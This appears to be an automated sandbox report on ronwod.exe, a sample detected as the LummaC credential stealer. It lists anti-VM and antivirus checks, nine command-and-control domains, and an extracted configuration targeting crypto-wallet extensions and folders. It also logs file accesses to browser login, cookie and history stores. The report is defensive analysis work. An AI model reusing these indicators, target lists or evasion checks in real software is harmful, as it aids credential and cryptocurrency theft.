Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBBE3B	0_2_00EBBE3B
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB9630	0_2_00EB9630
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECDE19	0_2_00ECDE19
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC8FD9	0_2_00EC8FD9
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA77AD	0_2_00EA77AD
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECF780	0_2_00ECF780
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA6777	0_2_00EA6777
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EAB729	0_2_00EAB729
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECE710	0_2_00ECE710

Source: C:\Users\user\Desktop\ronwod.exe	Code function: String function: 00E97FA0 appears 46 times
Source: C:\Users\user\Desktop\ronwod.exe	Code function: String function: 00EA3CD0 appears 74 times

Source: ronwod.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\ronwod.exe

Code function: 0_2_00EC7CF0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_00EC7CF0

Source: ronwod.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ronwod.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ronwod.exe, 00000000.00000003.1701781398.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724648396.0000000003F85000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1700876365.0000000003FA6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ronwod.exe	ReversingLabs: Detection: 43%
Source: ronwod.exe	Virustotal: Detection: 45%

Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: wsdapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: cr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: webservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: ronwod.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\ronwod.exe

Code function: 0_2_002314E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_002314E0

Source: ronwod.exe

Static PE information: real checksum: 0xd10d should be: 0xd10c

Source: ronwod.exe

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECB5B0 push eax; mov dword ptr [esp], 31A531AAh	0_2_00ECB5BE
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECE6B0 push eax; mov dword ptr [esp], 352E36E1h	0_2_00ECE6B3
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ED7616 push esi; retf	0_2_00ED7738
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ED7FDC pushad ; iretd	0_2_00ED7FDD

Source: C:\Users\user\Desktop\ronwod.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\ronwod.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ronwod.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\ronwod.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\ronwod.exe TID: 7568

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\ronwod.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: ronwod.exe, 00000000.00000003.1673073544.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701708029.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1875175343.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1775565703.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1896473117.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1798548795.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724682742.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750093043.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728584108.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1896473117.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1896833253.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\ronwod.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ronwod.exe

Code function: 0_2_00ECCD20 LdrInitializeThunk,

0_2_00ECCD20

Source: C:\Users\user\Desktop\ronwod.exe

Code function: 0_2_002314E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_002314E0

Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00231160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	0_2_00231160
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_0023116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	0_2_0023116C
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_002311A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	0_2_002311A3
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_002313C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	0_2_002313C9

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: ronwod.exe	String found in binary or memory: hummskitnj.buzz
Source: ronwod.exe	String found in binary or memory: appliacnesot.buzz
Source: ronwod.exe	String found in binary or memory: cashfuzysao.buzz
Source: ronwod.exe	String found in binary or memory: inherineau.buzz
Source: ronwod.exe	String found in binary or memory: screwamusresz.buzz
Source: ronwod.exe	String found in binary or memory: rebuildeso.buzz
Source: ronwod.exe	String found in binary or memory: scentniej.buzz
Source: ronwod.exe	String found in binary or memory: lackadausaz.click
Source: ronwod.exe	String found in binary or memory: prisonyfork.buzz

Source: C:\Users\user\Desktop\ronwod.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\ronwod.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: ronwod.exe, 00000000.00000003.1816042398.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1802540214.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1802434554.0000000003F71000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\ronwod.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: ronwod.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: 0.2.ronwod.exe.e90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ronwod.exe.e90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ronwod.exe.6cd40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1974188123.000000006CD4A000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ronwod.exe, 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: ronwod.exe, 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: ronwod.exe, 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: ronwod.exe, 00000000.00000002.1973681514.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":[""],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":[""],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":[""],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":[".dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":[""],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she..sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":
Source: ronwod.exe, 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: ronwod.exe, 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: ronwod.exe, 00000000.00000003.1701708029.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: ronwod.exe, 00000000.00000002.1973681514.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":[""],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":[""],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":[""],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":[".dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":[""],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she..sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":
Source: ronwod.exe, 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: ronwod.exe, 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
